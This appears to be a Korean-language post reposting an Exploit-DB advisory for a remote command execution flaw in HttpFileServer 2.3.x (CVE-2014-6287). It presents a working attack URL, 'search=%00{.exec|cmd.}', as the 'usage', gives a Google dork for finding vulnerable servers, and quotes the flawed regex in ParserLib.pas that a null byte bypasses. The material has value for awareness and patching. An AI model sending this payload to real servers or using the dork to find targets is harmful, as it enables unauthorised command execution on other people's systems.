Http File Server 2.3.x - Remote Command Execution

출처 : http://www.exploit-db.com

HttpFileServer 2.3.x 버전에서 Remote Command Execution 취약점이 확인이 되었습니다.

사용법은




http://localhost:80/search=%00{.exec|cmd.}

입니다

즉 hfs 시스템에서 파일을 검색하는 과정에서 파싱의 문자열 오류로 명령어가 입력이 되는 취약점 입니다.

아래는 전문입니다.

Affected software: http://sourceforge.net/projects/hfs/

Version : 2.3x

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution

# Google Dork: intext:"httpfileserver 2.3"

# Date: 11-09-2014

# Remote: Yes

# Exploit Author: Daniele Linguaglossa

# Vendor Homepage: http://rejetto.com/

# Software Link: http://sourceforge.net/projects/hfs/

# Version: 2.3.x

# Tested on: Windows Server 2008 , Windows 8, Windows 7

# CVE : CVE-2014-6287

 

issue exists due to a poor regex in the file ParserLib.pas

 

 

function findMacroMarker(s:string; ofs:integer=1):integer;

begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

 

 

it will not handle null byte so a request to

 

http://localhost:80/search=%00{.exec|cmd.}

 

will stop regex from parse macro , and macro will be executed and remote code injection happen.